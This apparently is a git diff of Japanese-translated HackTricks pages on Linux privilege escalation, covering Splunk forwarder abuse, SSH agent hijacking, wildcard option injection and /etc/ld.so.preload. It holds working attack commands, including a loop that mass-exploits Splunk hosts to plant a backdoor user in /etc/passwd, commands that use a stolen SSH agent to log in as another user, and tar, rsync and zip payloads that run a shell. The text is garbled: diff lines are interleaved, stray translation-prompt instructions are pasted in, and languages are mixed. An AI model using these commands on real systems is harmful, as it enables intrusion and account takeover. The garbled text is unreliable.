1. 搾取したいホストのIPを含むファイルを作成します。例えばip.txtという名前です。
2. 次のように実行します:
**悪用のための例のコマンド:**
```bash
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
```
ホスト情報:
Splunk Enterprise Server: 192.168.42.114\
Splunk Forwarder Agent Victim: 192.168.42.98\
攻撃者:192.168.42.51
Splunk Enterprise バージョン: 8.0.5 (2020年8月12日のラボ設定時点での最新版)\
Universal Forwarder バージョン: 8.0.5 (2020年8月12日のラボ設定時点での最新版)
#### Splunk, Incに対する改善推奨事項: <a href="#remediation-recommendations-for-splunk-inc" id="remediation-recommendations-for-splunk-inc"></a>
以下のすべての解決策を実装することを推奨します。これにより、防御の深さが提供されます:
1. 理想的には、Universal Forwarder エージェントはポートを開放せず、定期的にSplunkサーバーに指示を求めるべきです。
2. クライアントとサーバー間でTLS相互認証を有効にし、各クライアントに個別のキーを使用します。これにより、すべてのSplunkサービス間で非常に高い双方向セキュリティが提供されます。TLS相互認証はエージェントやIoTデバイスで広く実装されており、信頼できるデバイスクライアントからサーバーへの通信の未来です。
3. すべてのコード、単一行、またはスクリプトファイルを、Splunkサーバーによって暗号化および署名された圧縮ファイルで送信します。これはAPIを通じて送信されるエージェントデータを保護するものではありませんが、第三者による悪意のあるリモートコード実行から保護します。
#### Splunkの顧客に対する改善推奨事項: <a href="#remediation-recommendations-for-splunk-customers" id="remediation-recommendations-for-splunk-customers"></a>
1. Splunkエージェントに非常に強力なパスワードを設定してください。私は少なくとも15文字のランダムパスワードを推奨しますが、これらのパスワードは決して入力されないので、50文字のような非常に長いパスワードに設定することができます。
2. ホストベースのファイアウォールを設定して、Splunkサーバーからの8089/TCPポートUniversal Forwarder Agentのポートへの接続のみを許可します。
### Red Teamに対する推奨事項: <a href="#recommendations-for-red-team" id="recommendations-for-red-team"></a>
1. 各オペレーティングシステム用のSplunk Universal Forwarderのコピーをダウンロードしてください。これは優れた軽量で署名されたインプラントです。Splunkが実際にこれを修正する場合に備えて、コピーを保持しておくと良いでしょう。
### 他の研究者からのエクスプロイト/ブログ <a href="#exploitsblogs-from-other-researchers" id="exploitsblogs-from-other-researchers"></a>
利用可能な公開エクスプロイト:
## Splunkの特権昇格と永続性
**使用可能な公開エクスプロイト:**
* https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
* https://www.exploit-db.com/exploits/46238
* https://www.exploit-db.com/exploits/46487
関連するブログ投稿:
**Splunkクエリの悪用**
* https://clement.notin.org/blog/2019/02/25/Splunk-Universal-Forwarder-Hijacking-2-SplunkWhisperer2/
* https://medium.com/@airman604/splunk-universal-forwarder-hijacking-5899c3e0e6b2
* https://www.hurricanelabs.com/splunk-tutorials/using-splunk-as-an-offensive-security-tool
**詳細については、[https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)の投稿を確認してください**
_\*\* 注意: \*\*_ この問題はSplunkシステムにとって深刻な問題であり、他のテスターによって何年にもわたって悪用されてきました。Splunk Universal Forwarderのリモートコード実行は意図された機能ですが、その実装は危険です。私はこのバグをSplunkのバグ報奨金プログラムに提出しようとしましたが、非常に彼らが設計の意図を認識していない可能性が低いためですが、バグ報告はBug Crowd/Splunk開示ポリシーに従う必要があり、Splunkの許可なしには脆弱性の詳細を公に議論することは_決して_できないと通知されました。私は90日間の開示タイムラインを要求しましたが、拒否されました。そのため、私はこの問題を責任を持って開示しませんでした。なぜなら、Splunkは問題を認識しており、無視を選択していると合理的に確信しており、これが企業に深刻な影響を与える可能性があると感じ、情報セキュリティコミュニティが企業を教育する責任があると考えたからです。
## Splunkクエリの悪用
情報元 [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)
**CVE-2023-46214** は任意のスクリプトを **`$SPLUNK_HOME/bin/scripts`** にアップロードすることを可能にし、その後、検索クエリ **`|runshellscript script_name.sh`** を使用してそこに保存された **スクリプト****実行** する方法を説明しました:
<figure><img src="../../.gitbook/assets/image (721).png" alt=""><figcaption></figcaption></figure>
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksに広告を掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手してください。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)です。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**してください。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。
</details>
**CVE-2023-46214**は、**`$SPLUNK_HOME/bin/scripts`**に任意のスクリプトをアップロードし、その後、検索クエリ**`|runshellscript script_name.sh`**を使用して、そこに保存されている**スクリプト**を**実行**できることを説明していました。

151
linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md
View file

@ -1,165 +1,38 @@
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricks をサポートする他の方法:
HackTricksをサポートする他の方法:
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) コレクションを発見する
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 で私をフォローする [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **ハッキングテクニックを共有するためにPRを提出して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリに。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを発見する
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする**
* **ハッキングトリックを共有するには、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
</details>
# Summary
`/etc/ssh_config` または `$HOME/.ssh/config` 内でこのような設定を発見した場合、何ができるでしょうか:
`/etc/ssh_config`または`$HOME/.ssh/config`内でこのような設定を発見した場合、何ができるでしょうか:
```
ForwardAgent yes
```
もしマシン内でroot権限を持っている場合、おそらく/tmpディレクトリ内で見つけることができるsshエージェントを使用して、Bobをなりすますことができます:
Bobをなりすましてください:
BobをなりすますためにBobのssh-agentの1つを使用します:
```bash
SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
```
## なぜこれが機能するのか?
変数`SSH_AUTH_SOCK`を設定すると、Bobのssh接続で使用されたBobのキーにアクセスします。その後、彼の秘密鍵がまだそこにある場合(通常はそうである)、それを使用して任意のホストにアクセスできます。
`SSH_AUTH_SOCK`変数を設定すると、Bobの鍵にアクセスして、Bobのssh接続で使用された鍵にアクセスします。その後、彼の秘密鍵がまだそこにある場合(通常はそうである)、それを使用して任意のホストにアクセスできます。
秘密鍵はエージェントのメモリに平文で保存されているため、Bobであるが秘密鍵のパスワードを知らない場合でも、エージェントにアクセスして使用することができると思われます。
秘密鍵はエージェントのメモリに暗号化されずに保存されているため、Bobであっても秘密鍵のパスワードを知らなくても、エージェントにアクセスして使用することができると思われます。
もう1つのオプションとして、エージェントの所有者であるユーザーとrootは、エージェントのメモリにアクセスして秘密鍵を抽出することができるかもしれません。
# い説明と悪用
# 詳しい説明と悪用
**この投稿を、削除された投稿のウェイバックマシンとして提供します:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/)
## **ForwardAgentが信頼できない場合**
パスワードなしのSSHは、Unix系オペレーティングシステムとの生活をはるかに簡単にします。ネットワークがチェーンされたsshセッションを必要とする場合たとえば、制限されたネットワークにアクセスする場合など、エージェントの転送は非常に役立ちます。エージェントの転送を使用すると、ラップトップから開発サーバーに接続し、そこからさらに別のサーバーからsvnチェックアウトを実行することが可能です。すべてのパスワードなしで、同時にプライベートキーをローカルワークステーションに安全に保管します。
ただし、これは危険です。迅速なウェブ検索では、中間ホストが信頼できる場合にのみ安全であると示す記事がいくつか見つかります。しかし、なぜ危険なのかについての説明はほとんど見つかりません。
それがこの記事の目的です。しかし、まず、いくつかの背景情報を紹介します。
## **パスワードなし認証の仕組み**
通常モードで認証する際、SSHはあなたが自分自身であることを証明するためにパスワードを使用します。サーバーはこのパスワードのハッシュをファイルに持っているものと比較し、ハッシュが一致することを確認してから入室を許可します。
攻撃者がサーバーに送信される際にパスワードを保護するために使用される暗号化を解読できれば、それを盗むことができ、望むときにあなたとしてログインできます。攻撃者が何十万回もの試行を行うことが許可されると、最終的にはあなたのパスワードを推測できます。
はるかに安全な認証方法は、[公開鍵認証](http://www.ibm.com/developerworks/library/l-keyc/index.html)です。これはパスワードなしでログインする方法です。公開鍵認証には、公開鍵と秘密鍵の一致するペアが必要です。公開鍵は、秘密鍵でのみ復号できるメッセージを暗号化します。リモートコンピューターは、あなたに秘密のメッセージを暗号化して送信するためにあなたの公開鍵のコピーを使用します。あなたは、秘密鍵を使用してメッセージを復号し、メッセージをリモートコンピューターに送信することで、あなたがあなたであることを証明します。あなたの秘密鍵は常にローカルコンピューターに安全に保管されており、攻撃から守られています。
秘密鍵は貴重であり、保護する必要があるため、デフォルトでは暗号化形式で保存されています。残念ながら、これは使用する前に暗号化パスフレーズを入力する必要があることを意味します。多くの記事は、この不便を避けるためにパスフレーズのない(暗号化されていない)秘密鍵を使用することを提案しています。これは良い考えではありません。なぜなら、あなたのワークステーションにアクセスできる人(物理的アクセス、盗難、またはハッキングを通じて)は、あなたの公開鍵で構成されたコンピューターにも自由にアクセスできるからです。
OpenSSHには、ローカルワークステーションで実行されるデーモンである[ssh-agent](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent)が含まれています。これは、あなたの秘密鍵の復号済みコピーをメモリに読み込みます。したがって、一度だけ暗号化パスフレーズを入力する必要があります。その後、sshクライアントが使用できるローカル[ソケット](http://en.wikipedia.org/wiki/Unix\_domain\_socket)を提供します。リモートサーバーがあなたに秘密のメッセージを暗号化して送信するために、sshクライアントがそれに復号化するように要求することができます。あなたの秘密鍵は、パスワードを入力せずにsshをタイプすることができるまま、ssh-agentプロセスのメモリに安全に保管されたままです。
## **ForwardAgentの動作**
多くのタスクでは、「チェーン」されたsshセッションが必要です。以前の例を考えてみましょう。ワークステーションから開発サーバーにssh接続します。そこで、"svn+ssh"プロトコルを使用してsvn更新を実行する必要があります。超機密の秘密鍵の平文コピーを共有サーバーに残しておくのは愚かなことなので、パスワード認証に引っかかってしまいます。ただし、ワークステーションのssh構成で「ForwardAgent」を有効にした場合、sshは組み込みのトンネリング機能を使用して、開発サーバー上にもう1つのソケットを作成し、それをローカルワークステーションで実行されているssh-agentソケットに戻すトンネリングします。これにより、開発サーバー上のsshクライアントは、自分の秘密鍵にアクセスせずに、ローカルワークステーションで実行されているssh-agentに直接「この秘密メッセージを復号化してください」とリクエストを送信でき、svnサーバーに自分自身を認証できます。
## **なぜこれが危険なのか**
単純に言えば、中間サーバーのroot権限を持つ人は、あなたのssh-agentを自由に使用して他のサーバーに認証できます。簡単なデモンストレーションで、これがどれほど簡単に行われるかを示します。被告を保護するためにホスト名とユーザー名が変更されています。
私のラップトップはssh-agentを実行しており、そのソケットを介してsshクライアントプログラムと通信しています。このソケットへのパスは、SSH_AUTH_SOCK環境変数に保存されています。
```
mylaptop:~ env|grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/launch-oQKpeY/Listeners
mylaptop:~ ls -l /tmp/launch-oQKpeY/Listeners
srwx------ 1 alice wheel 0 Apr 3 11:04 /tmp/launch-oQKpeY/Listeners
```
[ssh-add](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-add) プログラムを使用すると、エージェント内のキーを表示および操作できます。
```
mylaptop:~ alice$ ssh-add -l
2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA)
```
私のラップトップの\~/.ssh/configには「ForwardAgent yes」と書かれています。したがって、sshはローカルソケットとリモートサーバーのローカルソケットを接続するトンネルを作成します
```
mylaptop:~ alice$ ssh seattle
seattle:~ $ env|grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/ssh-WsKcHa9990/agent.9990
```
たとえ私のキーが「seattle」にインストールされていなくても、sshクライアントプログラムはまだ私のローカルマシンで実行されているエージェントにアクセスできます
```
seattle:~ alice $ ssh-add -l
2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA)
```
だから…誰をいじめることができるのか?
```
seattle:~ alice $ who
alice pts/0 2012-04-06 18:24 (office.example.com)
bob pts/1 2012-04-03 01:29 (office.example.com)
alice pts/3 2012-04-06 18:31 (office.example.com)
alice pts/5 2012-04-06 18:31 (office.example.com)
alice pts/6 2012-04-06 18:33 (office.example.com)
charlie pts/23 2012-04-06 13:10 (office.example.com)
charlie pts/27 2012-04-03 12:32 (office.example.com)
bob pts/29 2012-04-02 10:58 (office.example.com)
```
Bobが好きではありません。彼のエージェント接続を見つけるために、彼のsshセッションの子プロセスを見つける必要があります
```
seattle:~ alice $ sudo -s
[sudo] password for alice:
seattle:~ root # pstree -p bob
sshd(16816)───bash(16817)
sshd(25296)───bash(25297)───vim(14308)
```
複数の方法がありますが、rootは実行中のプロセスの環境を表示できます。Linuxでは、そのデータは/proc/<pid>/environにあります。NULLで終端された文字列で保存されているため、NULLを改行に変換するためにtrを使用します。
```
seattle:~ root # tr '' 'n' < /proc/16817/environ | grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816
```
私は今、Bobのssh-agentを乗っ取るために必要なすべてを知っています。
```
seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh-add -l
2048 05:f1:12:f2:e6:ad:cb:0b:60:e3:92:fa:c3:62:19:17 /home/bob/.ssh/id_rsa (RSA)
```
もし特定のターゲットを持っている場合は、直接接続できるはずです。そうでない場合は、プロセスリストを監視したり、Bobの履歴ファイルをgrepしたりすると、たくさんの機会ターゲットが見つかるはずです。この場合、私はBobがサーバーに保存しているさまざまな超機密ファイルがあることを知っています。
```
seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
bob@boston:~$ whoami
bob
```
## **自己保護!**
ssh-agentがキーを無期限に保存しないようにしましょう。OS Xでは、Keychainを設定して、非アクティブ時や画面ロック時にロックされるようにします。他のUnix系プラットフォームでは、ssh-agentに -t オプションを渡すことで、キーが seconds 後に削除されるようにします。
信頼できないホストに接続する際は、エージェント転送を有効にしないでください。幸いにも、\~/.ssh/config 構文を使用すれば、これはかなり簡単です。
```
Host trustworthyhost
ForwardAgent yes
```
```
Host *
ForwardAgent no
```
## **おすすめの読み物**
* [OpenSSHキー管理](http://www.ibm.com/developerworks/library/l-keyc/index.html) Daniel Robbins
* [SSH Agent Forwardingの図解ガイド](http://www.unixwiz.net/techtips/ssh-agent-forwarding.html) Steve Friedl
* [ssh-agentマニュアル](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent)
* [ssh-addマニュアル](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-add)
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください**
</details>
**[オリジナルの研究はこちら](https://www.clockwork.com/insights/ssh-agent-hijacking/)**

57
linux-hardening/privilege-escalation/wildcards-spare-tricks.md
View file

@ -1,40 +1,33 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする**
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
</details>
## chown, chmod
**残りのファイルに対して、どのファイルオーナーと権限をコピーしたいかを指定できます**
**残りのファイルにコピーしたいファイルの所有者と権限を示すことができます**
```bash
touch "--reference=/my/own/path/filename"
```
以下のテキストは、ハッキング技術に関する本の内容です。関連する英語のテキストを日本語に翻訳し、まったく同じマークダウンおよびHTML構文を保持して翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名Workspace、aws、gcpなど、'leak'という単語、ペネトレーションテスト、およびマークダウンタグなどは翻訳しないでください。また、翻訳とマークダウン構文以外の余分なものは追加しないでください。
これを利用するには、[https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(組み合わせ攻撃)_ を使用します。\
__詳細は [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) にあります。
## Tar
**任意のコマンドを実行:**
**任意のコマンドを実行する:**
```bash
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
```
以下は、ハッキング技術に関するハッキングの本の内容です。ファイル linux-hardening/privilege-escalation/wildcards-spare-tricks.md の関連する英語テキストを日本語に翻訳し、まったく同じマークダウンおよびhtml構文を保持して翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名Workspace、aws、gcpなど、'leak'という単語、ペネトレーションテスト、およびマークダウンタグのようなものは翻訳しないでください。また、翻訳とマークダウン構文以外の余分なものは追加しないでください。
これを利用するには、[https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar attack)_ を使用します。\
__詳細は [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) にあります。
You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar attack)_\
More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)
## Rsync
@ -49,24 +42,24 @@ Interesting rsync option from manual:
```bash
touch "-e sh shell.sh"
```
この攻撃は [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) (_rsync_ 攻撃) を使用して利用できます。\
__詳細は [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) にあります。
You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(rsync attack)_\
More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)
## 7z
**7z** では、`--` の後に `*` を使用しても(`--` はその後の入力がパラメータとして扱われないことを意味するので、この場合はファイルパスのみです)、任意のエラーを発生させてファイルを読み取ることができます。したがって、以下のようなコマンドが root によって実行されている場合:
In **7z** even using `--` before `*` (note that `--` means that the following input cannot treated as parameters, so just file paths in this case) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root:
```bash
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
```
フォルダ内でファイルを作成できる場合、`@root.txt` ファイルと、読みたいファイルへの**シンボリックリンク**である `root.txt` ファイルを作成できます:
そして、このコマンドが実行されているフォルダ内にファイルを作成できるため、`@root.txt` というファイルと、ファイルを読み取りたいファイルへの**シンボリックリンク**である `root.txt` ファイルを作成できます:
```bash
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
```
その後、**7z**が実行されると、`root.txt`を圧縮すべきファイルのリストを含むファイルとして扱います(これは`@root.txt`の存在が示しています。そして、7zが`root.txt`を読むとき、`/file/you/want/to/read`を読みますが、**このファイルの内容がファイルのリストではないため、エラーを投げて内容を表示します。**
その後、**7z**が実行されると、それは`root.txt`を圧縮すべきファイルのリストを含むファイルとして扱います(`@root.txt`の存在が示していることそして7zが`root.txt`を読み取ると、`/file/you/want/to/read`を読み取りますが、**このファイルの内容がファイルのリストではないため、エラーが発生**して内容が表示されます。
_詳細はHackTheBoxのCTFボックスのWrite-upsを参照してください。_
_詳細はHackTheBoxのCTFのWrite-upsにあります。_
## Zip
@ -74,18 +67,16 @@ _詳細はHackTheBoxのCTFボックスのWrite-upsを参照してください。
```bash
zip name.zip files -T --unzip-command "sh -c whoami"
```
```
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェックしてください</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手してください。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加するか**、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローしてください。**
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする**
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
</details>
```

38
linux-hardening/privilege-escalation/write-to-root.md
View file

@ -2,22 +2,22 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけ
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加する、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする
* **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出してください
</details>
### /etc/ld.so.preload
このファイルは**`LD_PRELOAD`** 環境変数のように振る舞いますが、**SUIDバイナリ**でも機能します。\
作成または変更できる場合、実行される各バイナリでロードされる**ライブラリへのパスを追加**することができます。
このファイルは **`LD_PRELOAD`** 環境変数のように振る舞いますが、**SUIDバイナリ** でも機能します。\
作成または変更できれば、実行されるバイナリごとに **ロードされるライブラリへのパスを追加** することができます。
例: `echo "/tmp/pe.so" > /etc/ld.so.preload`
```c
@ -36,29 +36,27 @@ system("/bin/bash");
```
### Git フック
